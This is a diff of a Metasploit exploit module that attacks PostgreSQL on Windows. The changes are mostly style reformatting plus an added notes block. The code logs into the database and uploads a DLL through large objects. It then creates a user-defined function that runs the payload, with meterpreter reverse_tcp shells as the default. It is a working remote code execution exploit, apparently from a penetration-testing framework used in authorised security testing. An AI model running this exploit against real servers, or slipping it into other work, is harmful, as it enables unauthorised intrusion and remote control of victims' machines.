@@ -14,53 +14,60 @@ class MetasploitModule < Msf::Exploit::Remote
 
   # Creates an instance of this module.
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'PostgreSQL for Microsoft Windows Payload Execution',
-      'Description'    => %q{
-        On default Microsoft Windows installations of PostgreSQL the postgres
-        service account may write to the current directory (which is usually
-        "C:\Program Files\PostgreSQL\<version>\data" where <version> is the
-        major.minor version of PostgreSQL). UDF DLL's may be sourced from
-        there as well.
+    super(
+      update_info(
+        info,
+        'Name' => 'PostgreSQL for Microsoft Windows Payload Execution',
+        'Description' => %q{
+          On default Microsoft Windows installations of PostgreSQL the postgres
+          service account may write to the current directory (which is usually
+          "C:\Program Files\PostgreSQL\<version>\data" where <version> is the
+          major.minor version of PostgreSQL). UDF DLL's may be sourced from
+          there as well.
 
-        This module uploads a Windows DLL file via the pg_largeobject method
-        of binary injection and creates a UDF (user defined function) from
-        that DLL. Because the payload is run from DllMain, it does not need to
-        conform to specific Postgres API versions.
-      },
-      'Author'         =>
-      [
-        'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the postgresql udf libraries
-        'todb' # this Metasploit module
-      ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          This module uploads a Windows DLL file via the pg_largeobject method
+          of binary injection and creates a UDF (user defined function) from
+          that DLL. Because the payload is run from DllMain, it does not need to
+          conform to specific Postgres API versions.
+        },
+        'Author' => [
+          'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the postgresql udf libraries
+          'todb' # this Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'URL', 'https://web.archive.org/web/20100803002909/http://lab.lonerunners.net/blog/sqli-writing-files-to-disk-under-postgresql' ], # A litte more specific to PostgreSQL
         ],
-      'Platform'       => 'win',
-      'Targets'        =>
-      [
-        [ 'Windows x86',
-          {
-            'Arch' => ARCH_X86,
-            'DefaultOptions' => {
-              'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+        'Platform' => 'win',
+        'Targets' => [
+          [
+            'Windows x86',
+            {
+              'Arch' => ARCH_X86,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
+              }
             }
-          }
-        ],
-        [ 'Windows x64',
-          {
-            'Arch' => ARCH_X64,
-            'DefaultOptions' => {
-              'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+          ],
+          [
+            'Windows x64',
+            {
+              'Arch' => ARCH_X64,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
             }
-          }
+          ],
         ],
-      ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2009-04-10', # Date of Bernardo's BH Europe paper.
-    ))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2009-04-10',
+        'Notes' => {
+          'Reliability' => UNKNOWN_RELIABILITY,
+          'Stability' => UNKNOWN_STABILITY,
+          'SideEffects' => UNKNOWN_SIDE_EFFECTS
+        }
+      ) # Date of Bernardo's BH Europe paper.
+    )
 
     deregister_options('SQL', 'RETURN_ROWSET')
   end
@@ -79,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     self.postgres_conn = session.client if session
-    version = do_login(username,password,database)
+    version = do_login(username, password, database)
     case version
     when :noauth; print_error "Authentication failed"; return
     when :noconn; print_error "Connection failed"; return
@@ -99,21 +106,20 @@ class MetasploitModule < Msf::Exploit::Remote
     begin
       func_name = Rex::Text.rand_text_alpha(10)
       postgres_query(
-        "create or replace function pg_temp.#{func_name}()"+
-        " returns void as '#{fname}','#{func_name}'"+
+        "create or replace function pg_temp.#{func_name}()" +
+        " returns void as '#{fname}','#{func_name}'" +
         " language c strict immutable"
       )
     rescue RuntimeError => e
       print_error "Failed to create UDF function: #{e.class}: #{e}"
     end
     postgres_logout if @postgres_conn && session.blank?
-
   end
 
   # Authenticate to the postgres server.
   #
   # Returns the version from #postgres_fingerprint
-  def do_login(user=nil,pass=nil,database=nil)
+  def do_login(user = nil, pass = nil, database = nil)
     begin
       password = pass || postgres_password
       vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}") unless self.postgres_conn
@@ -139,5 +145,4 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
-
 end
